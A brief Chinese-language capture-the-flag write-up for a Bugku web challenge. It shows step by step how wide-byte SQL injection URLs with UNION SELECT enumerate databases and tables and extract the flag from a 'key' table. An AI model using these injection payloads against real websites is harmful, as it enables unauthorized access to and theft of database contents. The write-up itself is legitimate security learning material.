每天一道,逐步提升,持之以恒,贵在坚持
该题为bugku的web题
点开网址后,查看源代码,发现gb2312,可能是宽字节注入
进行宽字节注入
http://103.238.227.13:10083/?id=0%bf%27 union select 1,2 --+
获取所有数据库的名称
http://103.238.227.13:10083/?id=0%bf%27 union select 1,group_concat(schema_name) from information_schema.schemata --+
只有两个库,一个系统的,一个sql5,判断flag是放在sql5里的
获取sql5数据库的表
http://103.238.227.13:10083/?id=0%bf%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
发现只有两个表,一个是key,一个是test,按照提示,查询key表的 string字段
http://103.238.227.13:10083/?id=0%bf%27 union select 1,string from sql5.key where id=1 --+
flag为 54f3320dc261f313ba712eb3f13a1f6d
领取专属 10元无门槛券
私享最新 技术干货